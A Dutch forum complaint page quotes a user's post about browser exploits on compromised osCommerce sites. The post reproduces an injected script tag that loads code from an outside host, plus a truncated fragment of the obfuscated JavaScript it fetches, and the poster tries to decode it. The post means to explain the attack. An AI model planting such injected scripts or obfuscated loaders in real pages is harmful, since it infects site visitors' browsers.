Je hebt een klacht over de onderstaande posting:
Ik denk dat Niels Provos (van Google) gelijk heeft. Social Engineering kom ik zelden tegen, wel browser en plugin exploits. Bijv. in webpages van gecompromitteerde osCommerce websites (nog steeds zeer veel) zie ik nu veel: </title><script src=http://lamacom.net/images/j/></script> Gisteravond naar gekeken, dan wordt de volgende obfuscated javascript gedownload: Object.prototype.tes=-2;var s;aa=document.createTextNode("ha"+"rC"+"ode");s=String["fr"+"omC"+aa['nod'+'eVa'+'lue']];for(i in{})if(i=='t'+'e'+'s')h={};eval(s(7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h, 44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h, [knip] 7-h,7-h,123-h)); Ik snap er eerlijk gezegd geen barst van hoe dit werkt (ik ben geen JS expert) maar als ik de "n-h" evalueer met h=-2 (zal wel uit "Object.prototype.tes=-2" komen), en ik voer de waardes aan de functie fromCharCode() (dat kan online op http://jdstiles.com/java/cct.html), dan wordt 7-h (==9) een tab, 103-h een "i" en 100-h ...
Beschrijf je klacht (Optioneel):